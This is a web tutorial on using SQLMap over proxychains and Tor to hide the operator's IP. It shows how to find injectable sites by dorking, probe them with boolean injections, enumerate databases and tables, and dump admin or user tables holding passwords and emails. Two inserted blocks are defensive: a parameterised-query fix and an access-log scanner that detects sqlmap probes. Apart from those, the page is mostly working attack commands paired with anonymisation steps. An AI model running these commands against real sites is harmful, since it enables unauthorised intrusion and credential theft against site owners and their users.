Read a website's DB using SQLMap & Proxychains
Here I will show you how to use SQLMap to test for SQL injection whilst using proxychains to hide your IP.
I will be using:
OS: BackTrack 5 installed within VirtualBox
Tools: SQLMap (pre-installed on BT5), Tor (install instructions) and Proxychains
SQLMap is built for SQL injection, so you need to know a little SQL. In case you don't, here's a quick rundown, but I suggest you go and learn it properly:
SQL is used for reading, modifying, updating and deleting from databases.
READING: SELECT item FROM Table WHERE product=3
MODIFYING/UPDATING: UPDATE Table SET item=new WHERE product=3
DELETING: DELETE FROM Table WHERE product=3
or you could drop the whole table: DROP TABLE Table;
[h2 id="introduction"]Finding a website for testing[/h2] (note: this is for demonstration purposes only, it is illegal to test against sites that are NOT yours)
We need a website that passes its parameters through the URL. The easiest way to find one is dorking: using Google or a similar search engine to run very specific searches. Startpage.com is preferable to Google as it doesn't track or save your searches. To refine a Google search use the inurl: operator;
this tells Google to only return results where the search term appears in the URL. If we searched for inurl:products.php?product=
we'd get URLs like these:
www.CygnusH33L.tk/products.php?product=
www.CygnusH33LExample.tk/products.php?product=
www.CygnusH33Ltest.tk/products.php?product=
You can also use SQLMap to search Google and test the results directly, though I do not personally like this method:
python sqlmap.py -g inurl:products.php?id=
[h2 id="introduction"]Testing a website for injection points[/h2]
http://www.CygnusH33L.tk/products.php?product=3
The URL above is our test target; note how the parameter is defined in the URL: product=3.
Websites that do not sanitize their parameters properly are open to injection attacks, so we can modify the URL:
http://www.CygnusH33L.tk/products.php?product=3 and 1=0--
If the parameter is not sanitized, appending and 1=0-- tells the database to return nothing, because the query becomes
SELECT item FROM Table WHERE product=3 and 1=0--
See how our input is appended to the end of the query. If the website now displays a blank page, we can run the opposite test to confirm. Just do the reverse:
http://www.CygnusH33L.tk/products.php?product=3 and 1=1--
The website should now display correctly again.
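The two-request boolean check described above is also the check a developer can keep as a regression test against their own code. The following is an added example, not code from the original post: a minimal product lookup written two ways in Python against an in-memory SQLite table (constructed sample data, not the example site's). `vulnerable_lookup` concatenates the parameter into the query, which is exactly the pattern the `and 1=0--` / `and 1=1--` pair exposes; `safe_lookup` validates the parameter as an integer and binds it as a placeholder, so the same pair never reaches the database at all. Function, table and column names are this example's own.

```python
import sqlite3


def make_db():
    """Constructed stand-in for a site's products table (example data only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (product INTEGER, item TEXT)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?)",
        [(1, "widget"), (2, "gadget"), (3, "gizmo")],
    )
    return conn


def vulnerable_lookup(conn, product_param):
    """The 'before' handler: the request parameter is pasted straight into the
    SQL text, so 'product=3 and 1=0--' changes the WHERE clause."""
    sql = "SELECT item FROM products WHERE product=" + product_param
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn, product_param):
    """The hardened handler: the parameter must parse as an integer and is
    passed as a bound value, so the SQL text is fixed at coding time."""
    try:
        product_id = int(product_param)
    except ValueError:
        raise ValueError("product must be an integer")
    sql = "SELECT item FROM products WHERE product=?"
    return [row[0] for row in conn.execute(sql, (product_id,))]


def boolean_differential(lookup, conn):
    """The page's two-request test as a regression check. Returns True when the
    'and 1=1' and 'and 1=0' variants of product=3 give different results, i.e.
    the request controls the query. A ValueError means the input was rejected
    before any query ran, so the handler counts as not controllable."""
    try:
        true_case = lookup(conn, "3 and 1=1--")
        false_case = lookup(conn, "3 and 1=0--")
    except ValueError:
        return False
    return true_case != false_case


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler controllable:", boolean_differential(vulnerable_lookup, db))
    print("safe handler controllable:      ", boolean_differential(safe_lookup, db))
```

Run the block as a script and the vulnerable handler reports True while the hardened one reports False. Rejecting non-integer input is what makes the second result clean; binding alone would still let the two variants reach the database (as a string that matches nothing), just without any effect on the query structure.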
[h2 id="introduction"]Using SQLMap to read the DB[/h2]
Open a terminal
(if you have Tor installed, start it; if not, install Vidalia)
The easiest way to get Vidalia is to type in the terminal
sudo apt-get install synaptic
then go to
System -> Administration -> Synaptic Package Manager
and search for vidalia and install it along with Tor (Synaptic should prompt to install Tor together with Vidalia).
We will use proxychains to hide our IP. To configure proxychains, type in the terminal
sudo gedit /etc/proxychains.conf
then scroll to the bottom and look for the proxy list:
```
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 9050
```
The line socks4 127.0.0.1 9050 should have no # in front, as this is the Tor SOCKS port; you can add more SOCKS proxies in the same format.
Now start Tor/Vidalia
Back in the terminal, change to the SQLMap directory:
cd /pentest/database/sqlmap/
To see SQLMap's help:
python sqlmap.py --help
Test for an injection point (for this example the test site will be CygnusH33L.tk/products.php?product=3):
proxychains python sqlmap.py -u http://www.CygnusH33L.tk/products.php?product=3
SQLMap will now test the URL.
Should it not succeed, you can try verbose mode with the option -v to see what SQLMap is doing; you can set this between 1 (low) and 6 (high).
Now that it's confirmed injectable, let's move on. We want to know the database names; we can do this like so:
proxychains python sqlmap.py -u http://www.CygnusH33L.tk/products.php?product=3 --dbs
--dbs tells sqlmap to enumerate the databases.
Now we can enumerate the tables:
proxychains python sqlmap.py -u http://www.CygnusH33L.tk/products.php?product=3 -D Database_name --tables
-D tells sqlmap which database to use and --tables lists its tables.
If there are loads of tables we can use the option --threads to specify more threads (the default is 1); to use it, add --threads 8 (8 is recommended; I usually run 10 with no issues).
Now that we have the tables we can pull the columns and data from them. Which table you choose depends on what you are looking for: to log in to the site you would look for admin, customer, user or member tables containing usernames and passwords; for email addresses you would look in emails, newsletters, users or members tables, and so on. Just find the relevant table name.
To dump a table's columns and data use:
proxychains python sqlmap.py -u http://www.CygnusH33L.tk/products.php?product=3 -D Database_name -T table_name --dump --threads 8
This will dump all the columns and data from the chosen table into a file:
/pentest/database/sqlmap/output/www.CygnusH33L.tk/dump/table_name.csv
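From the server side, a run like the one above leaves a distinctive trail in the web server's access log, and because proxychains routes the requests over Tor, the client IP is a Tor exit rather than the operator, so detection has to key on the requests themselves rather than on the source address. The following is an added example, not part of the original tutorial: a small Python scanner over a few constructed Apache combined-format lines (placeholder IPs and paths). It flags the `sqlmap/...` User-Agent that sqlmap sends unless the operator overrides it (the exact version string in the sample is constructed), boolean `and 1=0` / `and 1=1` probes in the query string, and a quoted parameter that produced a 500 response. Names and regexes are this example's own.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines; IPs are documentation ranges, not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Oct/2012:13:55:36 +0000] "GET /products.php?product=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 - - [10/Oct/2012:13:55:40 +0000] "GET /products.php?product=3%20and%201%3D0-- HTTP/1.1" 200 310 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 - - [10/Oct/2012:13:55:41 +0000] "GET /products.php?product=3%20and%201%3D1-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.9 - - [10/Oct/2012:13:56:02 +0000] "GET /products.php?product=3 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
198.51.100.9 - - [10/Oct/2012:13:56:03 +0000] "GET /products.php?product=3%27 HTTP/1.1" 500 210 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
"""

# Apache "combined" log format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Tautology/contradiction appended to a parameter, e.g. "and 1=0--" or "or 1=1".
BOOL_RE = re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.IGNORECASE)


def parse_line(line):
    """Parse one combined-format line; the path is URL-decoded so encoded payloads match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["path"] = unquote_plus(entry["path"])
    return entry


def classify(entry):
    """Return the list of reasons this request looks like an injection probe (empty if none)."""
    reasons = []
    if entry["ua"].lower().startswith("sqlmap/"):
        reasons.append("sqlmap default User-Agent")
    if BOOL_RE.search(entry["path"]):
        reasons.append("boolean-injection probe in query string")
    if "'" in entry["path"] and entry["status"] == "500":
        reasons.append("quote in parameter triggered a server error")
    return reasons


def scan_log(text):
    """Group flagged requests by client IP: {ip: [(decoded_path, reasons), ...]}."""
    findings = {}
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            findings.setdefault(entry["ip"], []).append((entry["path"], reasons))
    return findings


if __name__ == "__main__":
    for ip, hits in scan_log(SAMPLE_LOG).items():
        for path, reasons in hits:
            print(ip, path, "->", "; ".join(reasons))
```

The User-Agent check is the cheapest signal but also the easiest to turn off, so the payload-shaped checks on the decoded query string carry more weight; pairing the 1=0 / 1=1 requests from the same client within a second or two is the behaviour worth alerting on, since that is the manual test the page walks through.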
I personally love SQLMap it makes testing SQL injections so easy compared with manual testing, I will expand on this tutorial to incorporate the many more features of SQLMap at a later date. I hope this helps some of you understand SQLMap and how it can be used safely with Tor and Proxychains.